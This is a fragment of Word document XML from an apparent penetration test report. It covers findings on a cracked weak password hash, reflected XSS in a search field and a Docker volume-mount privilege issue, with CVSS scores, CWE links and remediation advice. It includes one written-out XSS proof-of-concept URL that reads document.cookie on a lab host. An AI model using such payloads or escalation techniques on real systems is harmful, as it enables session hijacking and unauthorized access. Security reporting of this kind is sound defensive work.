            <w:hyperlink w:anchor="FigureAI141" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:lang w:val="en-IN"/>
                </w:rPr>
                <w:t>, Figure A.</w:t>
              </w:r>
              <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:lang w:val="en-IN"/>
                </w:rPr>
                <w:t xml:space="preserve">14.1 </w:t>
              </w:r>
              <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Weak Password Hash: Cracked by JtR</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D852C6" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureAI142" w:history="1">
              <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:lang w:val="en-IN"/>
                </w:rPr>
                <w:t xml:space="preserve">Figure A.14.2 </w:t>
              </w:r>
              <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Weak Password Hash: Privilege Escalation Executed</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w14:paraId="0B2612B4" w14:textId="77777777" w:rsidTr="00CD5DDB">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F8EFA52" w14:textId="029ADF8C" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00A94B74">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A94B74" w:rsidRPr="00D77DFE" w14:paraId="6C354B80" w14:textId="77777777" w:rsidTr="00CD5DDB">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A7EB4DD" w14:textId="77777777" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00A94B74">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId49" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/916.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="37FC7C32" w14:textId="39ED32D6" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00A94B74">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/03-Testing_for_Privilege_Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60805A1B" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00815CEC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664BC703" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00815CEC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:horzAnchor="page" w:tblpX="1516" w:tblpY="-345"/>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1E4866" w:rsidRPr="00D77DFE" w14:paraId="4421B7D1" w14:textId="77777777" w:rsidTr="00431D09">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FEF8DDA" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E2841" w:themeColor="text2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Reflected XSS via search input field</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E4866" w:rsidRPr="00D77DFE" w14:paraId="02F9F8F3" w14:textId="77777777" w:rsidTr="00431D09">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C959BAD" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866"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2821203" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866"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1E4866" w:rsidRPr="00D77DFE" w14:paraId="2ABF1B33" w14:textId="77777777" w:rsidTr="00431D09">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AD03F7E" w14:textId="0F00E880" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00431D0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VUL_15</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220ADFA" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00431D09">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71904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="159250E8" wp14:editId="481E2B1D">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>999830</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>34925</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="12065" t="6985" r="9525" b="8255"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1645648036"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88820D" id="Rectangle: Rounded Corners 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:78.75pt;margin-top:2.75pt;width:125.8pt;height:10.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" fillcolor="yellow" strokecolor="yellow">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E4866" w:rsidRPr="00D77DFE" w14:paraId="4A379CC5" w14:textId="77777777" w:rsidTr="00431D09">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0834308" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866"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4.7</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6AF32AB" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00431D09">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1E4866" w:rsidRPr="00D77DFE" w14:paraId="1894D537" w14:textId="77777777" w:rsidTr="00431D09">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285FDEB" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00431D09">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UI:R</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/S:C/</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A:N</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96AFDBB" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w14:paraId="2645E80F" w14:textId="77777777" w:rsidTr="00431D09">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0C45036" w14:textId="2BC01BAE"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A94B74" w:rsidRPr="00D77DFE" w14:paraId="72785268" w14:textId="77777777" w:rsidTr="00431D09">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736F596" w14:textId="2A0F8B90" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00431D0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Browser, ZAP Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w14:paraId="24346021" w14:textId="77777777" w:rsidTr="00431D09">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80F7626" w14:textId="2E17361E" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00431D0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A94B74" w:rsidRPr="00D77DFE" w14:paraId="09786F5D" w14:textId="77777777" w:rsidTr="00431D09">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830F6C9" w14:textId="03BE1423"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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cross-site scripting (XSS) enables malicious script execution in a victim’s browser, allowing impersonation, unauthorized actions, data access, and potentially full application compromise when privileged users are affected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w14:paraId="7AF5198A" w14:textId="77777777" w:rsidTr="00431D09">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9DF6A13" w14:textId="54A6B488" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00431D09">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A94B74" w:rsidRPr="00D77DFE" w14:paraId="124902B0" w14:textId="77777777" w:rsidTr="00431D09">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29FA9FD" w14:textId="3297B3FA" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId50" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>http://10.0.3.190/main.php?query=&lt;script&gt;alert(document.cookie)&lt;%2Fscript</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;, 10.0.3.190:80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w14:paraId="3688C212"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9B1D6C2" w14:textId="4EAB3A77"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A94B74" w:rsidRPr="00D77DFE" w14:paraId="0F7C55F7"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BAAB8B1" w14:textId="072FC528"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XSS exposure allows attackers to hijack sessions, steal credentials, and execute unauthorized actions by impersonating users through injected scripts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w14:paraId="1E19DD77"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7D8AAB7" w14:textId="4F4411E9"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A94B74" w:rsidRPr="00D77DFE" w14:paraId="35AAD183"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D81BFE0" w14:textId="75346B6C"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Cs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apply proper output encoding, enforce strict server-side input validation, and enable security-focused HTTP response headers to prevent XSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w14:paraId="365FBBA3"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E9DCA1D" w14:textId="347DF912" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing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A94B74" w:rsidRPr="00D77DFE" w14:paraId="0C1B6FE6"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99B0BAB" w14:textId="18273DE3" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing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Cs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Submit a crafted value in the main page’s search field and observe that it is reflected without proper encoding, leading to execution of the injected script in the browser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w14:paraId="7DBBAD23"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0761976" w14:textId="77777777" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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A94B74" w:rsidRPr="00D77DFE" w14:paraId="4F75F5F7" w14:textId="77777777" w:rsidTr="00431D09">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6F210A9" w14:textId="61596AB7" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Proof of Concept evidence is provided in Appendix A, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureAI151" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Figure A.15.1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureAI152" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Figure A.15.2  Reflected XSS via search input field</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w14:paraId="7E1AEB7B" w14:textId="77777777" w:rsidTr="00431D09">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313EA94" w14:textId="0BE791D6" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00431D09">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A94B74" w:rsidRPr="00D77DFE" w14:paraId="1F672CFE" w14:textId="77777777" w:rsidTr="00431D09">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207C6ED" w14:textId="17BB6A3E" w:rsidR="00A94B74" w:rsidRPr="00D77DFE" w:rsidRDefault="00A94B74" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId51" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/639.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A34069B" w14:textId="77777777" w:rsidR="00DB00A5" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB00A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15E135E9" w14:textId="77777777" w:rsidR="00815CEC" w:rsidRPr="00D77DFE" w:rsidRDefault="00815CEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E4603D" w14:textId="77777777" w:rsidR="004A1D00" w:rsidRPr="00D77DFE" w:rsidRDefault="004A1D00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CCE92C2" w14:textId="77777777" w:rsidR="004A1D00" w:rsidRPr="00D77DFE" w:rsidRDefault="004A1D00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9439" w:type="dxa"/>
        <w:tblInd w:w="-42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B71A69" w:rsidRPr="00D77DFE" w14:paraId="403E1661" w14:textId="77777777" w:rsidTr="004A1D00">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05B65DEE" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69" w:rsidP="00BC23B6">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Docker Misconfiguration: Unauthorized Host Filesystem Access via Container Volume Mount</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w14:paraId="24BE417A" w14:textId="77777777" w:rsidTr="004A1D00">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8ED5371"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3A6E57A"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B71A69" w:rsidRPr="00D77DFE" w14:paraId="2B4DF38D" w14:textId="77777777" w:rsidTr="004A1D00">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1E2BC17" w14:textId="2C3BB761" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69"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VUL_16</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2567EDE"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73952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4297BEDC" wp14:editId="50A02AD4">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>1021095</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>45558</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="188499750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E3DA1F" id="Rectangle: Rounded Corners 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:80.4pt;margin-top:3.6pt;width:125.8pt;height:10.0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" fillcolor="yellow" strokecolor="yellow">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w14:paraId="4F2652CC" w14:textId="77777777" w:rsidTr="004A1D00">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8852716"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 4.5</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739600A" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69"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B71A69" w:rsidRPr="00D77DFE" w14:paraId="244FC780" w14:textId="77777777" w:rsidTr="004A1D00">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C433CEC" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69"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AV:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/AC:H/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PR:L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S:U</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A:L</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A84D0ED" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-269: Improper Privilege Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w14:paraId="16365C67" w14:textId="77777777" w:rsidTr="004A1D00">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3A54435"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B71A69" w:rsidRPr="00D77DFE" w14:paraId="5C018B57" w14:textId="77777777" w:rsidTr="004A1D00">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E83A945" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69"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 GTFObins, bash script, Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w14:paraId="620F3572" w14:textId="77777777" w:rsidTr="004A1D00">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24B6930" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69"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B71A69" w:rsidRPr="00D77DFE" w14:paraId="2B596A14" w14:textId="77777777" w:rsidTr="004A1D00">
        <w:trPr>
          <w:trHeight w:val="205"/>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C823C8A" w14:textId="4420AE6F" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="0030328A" w:rsidP="00650AD5">
            <w:pPr>
              <w:spacing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The Linux host lets the unprivileged user stocznia run Docker containers with arbitrary host mounts. Using this, they accessed /home/sopot and retrieved my_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>backup.save</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
